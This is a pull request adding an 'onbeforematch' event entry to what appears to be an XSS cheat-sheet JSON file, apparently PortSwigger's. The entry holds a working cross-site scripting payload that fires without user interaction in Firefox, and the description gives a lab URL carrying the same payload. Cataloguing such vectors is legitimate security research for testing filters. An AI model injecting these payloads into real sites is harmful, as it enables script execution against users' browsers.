### PR TITLE
Add onbeforematch event - no user interaction

### DIFF
--- a/json/events.json
+++ b/json/events.json
@@ -6441,5 +6441,16 @@
         "interaction": true
       }
     ]
+  },
+  "onbeforematch": {
+    "description": "Fires when a hidden element is revealed",
+    "tags": [
+      {
+        "tag": "*",
+        "code": "<* id=x onbeforematch=alert(1) hidden=until-found>",
+        "browsers": ["firefox"],
+        "interaction": false
+      }
+    ]
   }
 }


### PR DESCRIPTION
For a quick demonstration, use https://subdomain1.portswigger-labs.net/xss/xss.php?x=%3Chtml%20id=xss%20onbeforematch=alert(1)%20hidden=until-found%3E#xss